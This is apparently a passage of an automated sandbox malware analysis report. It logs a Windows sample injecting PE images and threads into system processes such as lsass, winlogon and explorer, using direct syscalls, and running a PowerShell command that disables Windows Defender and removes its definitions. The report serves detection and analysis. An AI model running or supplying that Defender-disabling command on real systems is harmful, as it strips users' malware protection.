Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 293C71D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 124A2600000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 2DB0D940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 22D67CF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 231E6560000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D280EE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29A47940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\ProgramData\Microsoft\based.exe base: 235BB850000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\ProgramData\Microsoft\based.exe base: 1EB88710000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 2879CCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1BCECE80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\ProgramData\svchost.exe base: 2C3F57C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\ProgramData\svchost.exe base: 23340F40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 181280D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 261E5AC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1EC96960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\timeout.exe base: 285327A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 1EC96AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D8E5800000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A415273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 645B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6693273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B55273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC65273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7874273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EC97273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C71D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A260273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D94273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67CF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E656273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CD9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 61CB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 80EE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4794273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BB85273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8871273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9CCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: ECE8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F57C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40F4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6313273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 280D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E5AC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9696273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 461D273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Program Files\Google\Chrome\updater.exe EIP: 9EDD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 327A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 96AF273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E580273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files\Google\Chrome\updater.exe	NtQuerySystemInformation: Direct from: 0x7FF74A1742AE
Source: C:\ProgramData\setup.exe	NtQuerySystemInformation: Direct from: 0x7FF65F1742AE

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 87C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBEC970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 293C71D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 124A2600000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 2DB0D940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 22D67CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 231E6560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 200CD9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA61CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D280EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29A47940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\Microsoft\based.exe base: 235BB850000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\Microsoft\based.exe base: 1EB88710000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2879CCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1BCECE80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22E54100000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\svchost.exe base: 2C3F57C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\svchost.exe base: 23340F40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E63130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 181280D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 261E5AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EC96960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 13C461D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\updater.exe base: 23E9EDD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\timeout.exe base: 285327A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EC96AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D8E5800000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 87C0000 value: 4D

Maps a DLL or memory area into another process

Source: C:\ProgramData\setup.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly

Modifies Windows Defender protection settings

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
